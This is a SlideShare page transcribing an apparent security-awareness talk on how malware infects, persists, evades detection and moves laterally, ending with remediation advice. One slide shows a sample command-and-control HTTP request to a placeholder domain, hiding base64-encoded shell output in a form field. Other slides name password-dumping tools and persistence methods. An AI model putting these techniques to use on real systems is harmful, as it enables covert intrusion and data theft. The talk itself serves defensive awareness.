SlideShare a Scribd company logo

ECrime presentation - A few bits about malware

Download as PPTX, PDF
Michael Hendrickx
Michael Hendrickx

This document discusses malware attacks and provides information about different types of malware like RATs, viruses, trojans, and ransomware. It describes the two main stages of a malware attack - infection and persistence. Common infection methods include exploiting software bugs, spear phishing, waterhole attacks, and inserting malware via USB devices. The persistence stage ensures the malware remains active by hiding from antivirus software and maintaining connections to command and control servers. Remediation involves improving user awareness, tightening endpoint controls, and regularly scanning with antivirus and malware detection tools.

Related slideshows

SSH - From Zero to Hero
SSH - From Zero to HeroSSH - From Zero to Hero
SSH - From Zero to Hero
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
1 of 20
A few bits about Malware A story about trojan horses and rats.
$ whoami • Michael Hendrickx • Senior Security Analyst @ HelpAG • Vulnerability Assessments • Social Engineering • Presentations  • Created new undetected* RAT for the company • Belgian * Until now 
Malware attacks: a real threat • Malware have caused a lot of damage • Many names: RAT’s, virus, Trojan, rootkit, ransomware, … • Examples: Cryptolocker, Zeus, BlackEnergy, … • Targets different platforms: • Browsers • Smartphones • PC’s
Malware attacks: stages • Malware attacks comes in 2 stages Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement “you’re in trouble”
Malware attacks: infection • Stage 1: modes of Infection Exploited Software Bugs (Spear) phishing Waterhole attack Malicious USB
Malware attacks: infection • Exploited software bugs • Attacker hacks into vulnerable service • Could be anything: • SQL injection on website leads to code execution • Poorly implemented upload functionality • Unpatched server software • Man in the Middle • Weak passwords • …
Malware attacks: infection • Spear phishing • Very specific message to single or very few victims • Holds malicious payload • Macro, PDF, renamed files, trojaned archives, … • Or, links to malicious file: • Needs to be downloaded, won’t get caught by your AV.
Malware attacks: infection • Waterhole attack • Indirect targeted attack • Attacker compromises sites that the victim probably visits. • Exploits outdated browser or plugins • Forces install of malware “your flash player is outdated” “you should update Java”
Malware attacks: infection • Evil USB dongle • USB peripheral can be anything • USB hard drive / dongle • Keyboard, WIFI / network adapter, Microphone, … • Hub with any of the above • Example: USB rubber ducky • Looks like dongle, is a keyboard • Types 1000 words per minute • Is only 30 USD
Malware attacks: stages • On to stage 2: Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement
Malware attacks: persistence • Stage 2: Persistence • Execution persistence • Ensure that our malware keeps on running • CnC Connectivity • Listen for commands • AV Evasion / Hiding • To prevent malware from being detected, removed • Lateral movement • Infect more machines
Malware attacks: Execution persistence • Ensure malware keeps on running • Startup folder • Registry keys • Automatic Services • Browser plugins / helper objects • You’re re-infected whenever the browser is opened • Infected document templates • Every time a word/ppt/excel file is opened or created, you’re re-infected. Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
Malware attacks: CnC connectivity • Direct traffic • Probably (hopefully) detected and blocked • HTTP Tunnel • May get detected by L7 firewalls • “deep packet inspection”, pretty shallow • HTTPS • Difficult to see what’s happening, unless MITM. • DNS Tunneling • Usually gets “proxied” to target DNS server • Do you monitor anomalies? • Peer to peer WIFI network Hi, I’m an ad-hoc wifi network Up to 10 – 20 meters
Malware attacks: hagrat CnC • Encode / Encrypt / Obfuscate traffic POST /css/cc.aspx HTTP/1.1 Accept: text/html;q=0.8,application/xml,*/* Accept-Language: en-gb;q=0.8,en Content-Type: application/x-www-form-urlencoded Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: www.thisisafakedomain.com Content-Length: 277 Connection: Keep-Alive __VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;. 1:Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:UsershendrickxownCloud>dir c:/ Invalid switch - "". C:UsershendrickxownCloud>
Malware attacks: hiding • Hiding • Download multiple stages Dropper Malicious Payload (Real Virus)
Malware attacks: hiding • Multi stage download ensures correct victim Malicious Payload (Real Virus)Can I reach the Internet? Dropper Innocent Payload This is not the IP / Company / country I’m targeting Cool, I’ll install it Bingo!
Malware attacks: lateral movement • Exfiltration of information • Documents (%userprofile%documents) • Passwords (mimikatz, Lazagne) • Browser history • Emails, files, … • Recon / Infect the network • Ping other machines • File shares • (Sharepoint) portals
Remediation • Human factor: don’t get infected • Social Engineering exercises • Awareness • Alerting IT security (“Support, I think I did something wrong”) • Technical factor: prevent, detect, destroy • Tight controls on end points • Monitor inbound programs (attachments, downloads, …) • Monitor network usage • DNS Anomalies, unidentified protocols, … • Regular scanning with AV, IOC detectors, … • Such as Loki: (https://github.com/Neo23x0/Loki)
Thank you! Questions? Don’t accept any USB dongles from me! 
CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM DUBAI, UAE ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741 T +971 4 440 5666 F +971 4 363 6742 ABU DHABI, UAE SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195 T +971 2 644 3398 F +971 2 639 1155 DOHA, QATAR AL DAFNA – PALM TOWER OFFICE 4803, WEST BAY, P.O. BOX 31316 T +974 4432 8067 F +974 4432 8069

More Related Content

ECrime presentation - A few bits about malware

  • 1. A few bits about Malware A story about trojan horses and rats.
  • 2. $ whoami • Michael Hendrickx • Senior Security Analyst @ HelpAG • Vulnerability Assessments • Social Engineering • Presentations  • Created new undetected* RAT for the company • Belgian * Until now 
  • 3. Malware attacks: a real threat • Malware have caused a lot of damage • Many names: RAT’s, virus, Trojan, rootkit, ransomware, … • Examples: Cryptolocker, Zeus, BlackEnergy, … • Targets different platforms: • Browsers • Smartphones • PC’s
  • 4. Malware attacks: stages • Malware attacks comes in 2 stages Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement “you’re in trouble”
  • 5. Malware attacks: infection • Stage 1: modes of Infection Exploited Software Bugs (Spear) phishing Waterhole attack Malicious USB
  • 6. Malware attacks: infection • Exploited software bugs • Attacker hacks into vulnerable service • Could be anything: • SQL injection on website leads to code execution • Poorly implemented upload functionality • Unpatched server software • Man in the Middle • Weak passwords • …
  • 7. Malware attacks: infection • Spear phishing • Very specific message to single or very few victims • Holds malicious payload • Macro, PDF, renamed files, trojaned archives, … • Or, links to malicious file: • Needs to be downloaded, won’t get caught by your AV.
  • 8. Malware attacks: infection • Waterhole attack • Indirect targeted attack • Attacker compromises sites that the victim probably visits. • Exploits outdated browser or plugins • Forces install of malware “your flash player is outdated” “you should update Java”
  • 9. Malware attacks: infection • Evil USB dongle • USB peripheral can be anything • USB hard drive / dongle • Keyboard, WIFI / network adapter, Microphone, … • Hub with any of the above • Example: USB rubber ducky • Looks like dongle, is a keyboard • Types 1000 words per minute • Is only 30 USD
  • 10. Malware attacks: stages • On to stage 2: Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement
  • 11. Malware attacks: persistence • Stage 2: Persistence • Execution persistence • Ensure that our malware keeps on running • CnC Connectivity • Listen for commands • AV Evasion / Hiding • To prevent malware from being detected, removed • Lateral movement • Infect more machines
  • 12. Malware attacks: Execution persistence • Ensure malware keeps on running • Startup folder • Registry keys • Automatic Services • Browser plugins / helper objects • You’re re-infected whenever the browser is opened • Infected document templates • Every time a word/ppt/excel file is opened or created, you’re re-infected. Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
  • 13. Malware attacks: CnC connectivity • Direct traffic • Probably (hopefully) detected and blocked • HTTP Tunnel • May get detected by L7 firewalls • “deep packet inspection”, pretty shallow • HTTPS • Difficult to see what’s happening, unless MITM. • DNS Tunneling • Usually gets “proxied” to target DNS server • Do you monitor anomalies? • Peer to peer WIFI network Hi, I’m an ad-hoc wifi network Up to 10 – 20 meters
  • 14. Malware attacks: hagrat CnC • Encode / Encrypt / Obfuscate traffic POST /css/cc.aspx HTTP/1.1 Accept: text/html;q=0.8,application/xml,*/* Accept-Language: en-gb;q=0.8,en Content-Type: application/x-www-form-urlencoded Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: www.thisisafakedomain.com Content-Length: 277 Connection: Keep-Alive __VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;. 1:Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:UsershendrickxownCloud>dir c:/ Invalid switch - "". C:UsershendrickxownCloud>
  • 15. Malware attacks: hiding • Hiding • Download multiple stages Dropper Malicious Payload (Real Virus)
  • 16. Malware attacks: hiding • Multi stage download ensures correct victim Malicious Payload (Real Virus)Can I reach the Internet? Dropper Innocent Payload This is not the IP / Company / country I’m targeting Cool, I’ll install it Bingo!
  • 17. Malware attacks: lateral movement • Exfiltration of information • Documents (%userprofile%documents) • Passwords (mimikatz, Lazagne) • Browser history • Emails, files, … • Recon / Infect the network • Ping other machines • File shares • (Sharepoint) portals
  • 18. Remediation • Human factor: don’t get infected • Social Engineering exercises • Awareness • Alerting IT security (“Support, I think I did something wrong”) • Technical factor: prevent, detect, destroy • Tight controls on end points • Monitor inbound programs (attachments, downloads, …) • Monitor network usage • DNS Anomalies, unidentified protocols, … • Regular scanning with AV, IOC detectors, … • Such as Loki: (https://github.com/Neo23x0/Loki)
  • 19. Thank you! Questions? Don’t accept any USB dongles from me! 
  • 20. CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM DUBAI, UAE ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741 T +971 4 440 5666 F +971 4 363 6742 ABU DHABI, UAE SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195 T +971 2 644 3398 F +971 2 639 1155 DOHA, QATAR AL DAFNA – PALM TOWER OFFICE 4803, WEST BAY, P.O. BOX 31316 T +974 4432 8067 F +974 4432 8069